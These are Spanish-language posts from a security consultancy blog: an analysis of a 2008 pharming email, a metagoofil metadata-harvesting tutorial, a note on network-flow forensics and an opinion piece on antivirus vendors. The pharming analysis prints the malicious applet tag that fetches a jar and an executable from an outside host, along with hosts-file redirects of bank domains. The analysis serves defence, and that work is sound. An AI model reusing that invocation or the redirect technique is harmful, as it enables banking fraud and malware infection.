Hace unas semanas un amigo nuestro, especialista en Debian, nos hizo saber de una importante vulnerabilidad en Debian. Quizás sea un poco tarde para platicar del tema, pero he aquí la imagen que lo resume todo.
Staff
JaCkSecurity
Conocimiento, Conciencia y Consultoría
JaCkSecurity ha documentado un pharming que recibiese el martes 13 mayo 2008 (Tue, 13 May 2008 19:02:28 -0400)
EVIDENCIA PRINCIPAL
To: javier@jacksecurity.com
Subject: Video parodia de Tula Rodriguez y su embarazo
From: Maria Isabel
Hola;
Maria te recomienda la siguiente noticia: Video Parodia (burla) de Tula Rodriguez y su embarazo
URL: http://club-classic.nl/noticias/Video_parodia_de_Tula_Rodriguez_y_su_embarazo.html
Mira este video je je, se aprecia a una joven que imita a Tula al mejor estilo de una artista cómica
y cuenta de manera sarcástica el momento de la inusual confesión.
Esperamos que sea de tu agrado.
Saludos,
Análisis principal
Invocación maliciosa:
< a p p l e t name="link" code="Inicio.class" archive="http://boardpix.com/lehigh/content/Crow/ link . jar" height="10" width="1"> < p a r a m name="url" value="http : // boardpix . com /lehigh/content/Crow/xxxxxxxx.exe"> < / applet >
Análisis del binario que trata de instalarse sigilosamente:
http://www.threatexpert.com/report.aspx?md5=d010e2779c2a175ada1d9a548654bbfe
Datos del archivo referido dentro del binario:
72.249.25.219 viabcp.com
72.249.25.219 http://viabcp.com
72.249.25.219 www.viabcp.com
72.249.25.219 pagum.com
72.249.25.219 http://pagum.com
72.249.25.219 www.pagum.com
72.249.25.219 peb1.bbvanetlatam.com
Servidores de terceros afectados en el pharming:
club-classic.nl (donde se aloja la trampa visual)
boardpix.com (donde se aloja el binario)
no-problem.com.mx (donde se aloja las direcciones IP referidas por el binario)
Cabecera del correo original
From – Tue May 13 18:02:58 2008
X-Account-Key: account2
X-UIDL: UID17353-1168226604
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-path:
Envelope-to: javier@jacksecurity.com
Delivery-date: Tue, 13 May 2008 19:02:37 -0400
Received: from jsadmin by a2s5.a2hosting.com with local-bsmtp (Exim 4.68)
(envelope-from
id 1Jw3Vs-00025y-Uy
for javier@jacksecurity.com; Tue, 13 May 2008 19:02:37 -0400
X-Spam-Checker-Version: SpamAssassin 3.2.3 (2007-08-08) on a2s5.a2hosting.com
X-Spam-Level: **
X-Spam-Status: No, score=2.8 required=5.0 tests=HTML_MESSAGE,
HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,RDNS_NONE autolearn=disabled
version=3.2.3
Received: from [74.53.114.5] (helo=demodocus.site5.com)
by a2s5.a2hosting.com with esmtps (TLSv1:AES256-SHA:256)
(Exim 4.68)
(envelope-from
id 1Jw3Vs-00025g-EC
for javier@jacksecurity.com; Tue, 13 May 2008 19:02:28 -0400
Received: from idham by demodocus.site5.com with local (Exim 4.68)
(envelope-from
id 1Jw3Vd-00032t-Iv
for javier@jacksecurity.com; Tue, 13 May 2008 18:02:13 -0500
To: javier@jacksecurity.com
Subject: Video parodia de Tula Rodriguez y su embarazo
From: Maria Isabel
Content-type: text/html
MIME-Version: 1.0rn
Message-Id:
Date: Tue, 13 May 2008 18:02:13 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname – demodocus.site5.com
X-AntiAbuse: Original Domain – jacksecurity.com
X-AntiAbuse: Originator/Caller UID/GID – [33075 501] / [47 12]
X-AntiAbuse: Sender Address Domain – demodocus.site5.com
X-Source: /usr/bin/php
X-Source-Args: /usr/bin/php indexx.php
X-Source-Dir: khairilidham.com:/public_html/content
Enlaces de terceros que fueron usados:
http://www.elgonzi.com/2008/05/video-parodia-de-tula-rodriguez-y-su.html
http://www.youtube.com/watch?v=Q4QwiLk183o
Staff
JaCkSecurity
Conocimiento, Conciencia y Consultoría
Ocasionalmente, en varias de las charlas a las que tenido el privilegio de ser invitado he mencionado a metagoofil como instrumento de hacking pasivo y para auto auditorias. Por esa razón y en mérito a la nueva versión 1.4, decidí documentar en este post la utilidad y algunas otras cosas más de esta herramienta.
Primero, es necesario saber que Metagoofil puede ejecutarse en Windows, Linux y MacOS, ya que está escrito en Python. Sin embargo, quizás halle más sencillo y transparente el instalarlo en un Linux. Así, si usas -por ejemplo- Debian, asegúrase de tener instalado el programa “extract”, que lo instalas con “apt-get install extract”. Para ello, es posible que debas instalar el libextractor también “apt-get install libextractor”. Si no lo tienes en tu lista de paquetes, actualízala primero, con “apt-get update”. Si la lista no se actualiza, sugiero meterle mano al /etc/apt/sources.list (Consulta http://www.debian.org/distrib/packages#view por “libextractor” para tener la ruta más apropiada). Yo uso Debian4 (etch).
Segundo, si estás usando un Linux dentro de una máquina virtual, asegúrate de no porfiar tu ejecución basado en una interfase virtual que dependa de una inalámbrica, pues por alguna razón (que presumo se provoca en la confección de paquete) varias de mis pruebas fracasaron desde dicha interfase. Usa una interfase Ethernet (red cableada).
Asi mismo, vas a tener problemas con extract, así que (usando “find / -name extract”) asegúrate de modificar el script “metagoofil.py” e indicar la ruta real del programa extract que usará metagoofil. De todos modos, obtendrás un error a la salida al momento de ejecutar metagoofil.
Dado que está escrito en Python, todo lo que tienes que hacer en tu sistema es desempaquetarlos (“tar -xvf metagoofil.tar”). Si tu Linux corre en modo texto, no te apenes, recuerda que puedes usar “wget” para descargar el archivo (posiblemente en /tools) con “wget http://www.edge-security.com/soft/metagoofil-1.4.tar”. Recuerda, si no tienes “wget”, instálalo con un “apt-get wget”.
Luego, para ejecutar metagoofil sólo deberás invocar el script conforme la ayuda misma que se provoca al tipear “./metagoofil.py”. Allí notarás que debes asignarle un valor a cada variable del script. Veamos, luce así:
./metagoofil.py -d jacksecurity.com -l 20 -f all -o prueba.html -t files
Así, la salida se grabará en /tools/metagoofil/files, y el archivo principal estará en /tools/metagoofil/prueba.html.
En la prueba hecha a nuestro dominio, se descubrieron usuarios como: easyPDF SDK 4.3, JR, blanca, sin ninguna ruta valiosa. No obstante, aunque sólo en uno de esos casos se descubre un viejo usuario de nuestros sistemas, también se halla un dato curioso: easyPDF SDK 4.3, que lejos de ser un usuario nuestro, denota qué fabricante ha confeccionado uno de los PDF descargados (en Google: “easyPDF SDK 4.3″). Este último dato, que a pesar de ser un desperdicio para un ataque de fuerza bruta, no lo es para identificar posibles vulnerabilidades en esta pieza de archivo (una idea un tanto diabólica, y por ahora improbable).
¿Qué puedes hacer con Metagoofil? Puedes extraer la data de la data, y deducir algo más que usuarios, aún con archivos tan limitados como los nuestros. Por otro lado, aunque su utilidad ha sido ampliamente difundida para trabajos de auditoria y hacking externo, nada impediría que alguien rediseñe el script para búsquedas en Intranets, y así hallar usuarios cuando no se pudo obtener la base de usuarios por ataques de null-sessions.
¿Tip de contra-ataque?
Busca en tus logs del servidor web, sentencias como “Python-urllib/1.16″, y verás que archivos fueron auditados por “metagoofil”, ya sea en manos tuyas o en manos de terceros.
Javier Romero
JaCkSecurity, CTO
Conocimiento, Conciencia y Consultoría
(PARTE 1) Cuando una organización (pública o privada) sufre una fuga de información de algún sistema informático, es inevitable que los líderes de la misma recurran a su departamento de seguridad TI como primera instancia para ayuda forense.
La razón principal de este relación, es precisamente la fuente de almacenamiento principal de dicha información, un sistema informático. En ese sentido, los posibles vehículos de fuga posible pueden variar en un no muy gran avanico de posibilidades: los medios magnéticos (tapes), los medios de almacenamiento óptico (CD/DVD), el mismo disco duro del sistema informático, los USB-drives, y la red.
Aunque dependiendo del criterio del especialista, uno de los medios de fuga que se deben descartar primero es la red. A diferencia de un USB-drive, tape, CD o DVD, que puede ser confiscado físicamente en la portería de la organización (no obstante, de generar una ruidosa condición de pánico al personal y de alerta al “insider”), la red podría seguir siendo un medio incontrolable de fuga de información, luego del incidente. De esta forma, la red debe ser el primer medio de despistaje forense al alcance del departamento de seguridad TI.
Una forma efectiva pero -muy criticada por su factibilidad- es el despliegue de capturadores de tráfico en los cuellos de la red de la organización. Un mecanismo de captura puede ser ubicado y configurado a diferentes nivel de detalle, que un analista de protocolos puede acomodarse sin mayor problemas. Su principal detractor es el espacio de almacenamiento que requieren los equipos de captura, cuya demanda será proporcional al tráfico de la red.
Sin embargo, una forma más inteligente y económica es el despliegue de colectores de flujos (flows). Los colectores de flows pueden ser consultados luego de viajar a un sistema de base de datos, en tiempo real o hacia atrás. Ello permite al analista forense, realizar una infinita cantidad de consultas por el tráfico de la red, a fin de determinar la duracción, tamaño, y equipos que mantuvieron ciertas comunicaciones sospechosas.
Una fuga de información como la sufrida recientemente por la nación chilena, requiere -por ejemplo- de este tipo de evidencias rápidas. Viajando a través de un análisis exhaustivo de los flujos generados por las redes de las instituciones afectadas, el analista buscará el tráfico que represente la transferencia (upload o download) de semejante volumen de datos, hacia RapidShare o hacia cualquier otro lugar en la red, desde o hacia los sistemas afectados.
JaCkSecurity dispone de mecanismos para ayudarlo a preparse tempranamente para penosos e inevitables incidentes como estos. Sírvase consultarnos por estos mecanismos.
Javier Romero
JaCkSecurity, CTO
Conocimiento, Conciencia y Consultoría
Honestamente, desde que descubrí que es posible vivir sin un antivirus instalado en portátiles, PCs y servidores, jamás había apreciado a los antivirus -en sí mismos- como una fuerza de poder en el cuadrilátero de la seguridad informática, excepto claro por sus elegantes equipos de ingenieros que -hoy en día- divulgan sus hallazgos a toda la comunidad experta. Sin embargo, luego de leer esta noticia (JaCkNews), concluyo lo contrario.
Resulta que ahora, el mismo elemento -el malware- por el cuál ahora son tan inefectivos, se han vuelto a su favor. Efectivamente, como cita Hispasec, los desarrolladores de kits de malware (para botnets) han delegado el “poder” del embargo a las casas de antivirus, para protegerse de la piratería, qué formidable idea. Dicho de otra forma, se trata de convertir a los antivirus en un team gratuito de un embargo virtual de un software maligno que ha sido pirateado.
El único problema es que el poder que ejercerían los antivirus sería ahora a favor de la industria criminal contra quienes intentan luchar. Pero, guardándonos la impresión de sorpresa, podemos decir, que esta no es la primera vez que vemos una conducta similar en el mundo criminal, en realidad sucede a todos los niveles del crimen. Sin le pegamos una vista a los gobiernos, esto es exactamente lo que hacen sus personajes corruptos cuando quieren vengarse de otros más (o mas bien menos) corruptos, al soplarlos y revelarlos a la opinión pública.
Por último, aunque asumo que para muchos lectores los AV siempre fueron una fuerza de poder “del bien” en sí mismo, no debemos de dejar de reconocer que -ahora- se han convertido en la fuerza de poder a favor del mal, aún sin siquiera saberlo.
La próxima que invierte S/.240.00 (USD 80.00) en una caja completa de AV piense que su contribución económica a su marca favorita no sólo hará de su proveedor una fuerza de poder del bien (según usted así lo cree), sino también del mal. “Piense”, y no se disguste luego.
Javier Romero
JaCkSecurity, CTO
Conocimiento, Conciencia y Consultoría
